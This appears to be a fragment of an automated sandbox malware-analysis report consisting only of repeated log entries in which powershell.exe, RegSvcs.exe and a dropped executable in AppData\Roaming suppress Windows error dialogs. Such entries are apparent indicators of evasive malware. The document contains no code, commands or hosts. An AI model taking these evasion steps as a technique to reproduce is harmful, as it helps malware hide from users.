                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
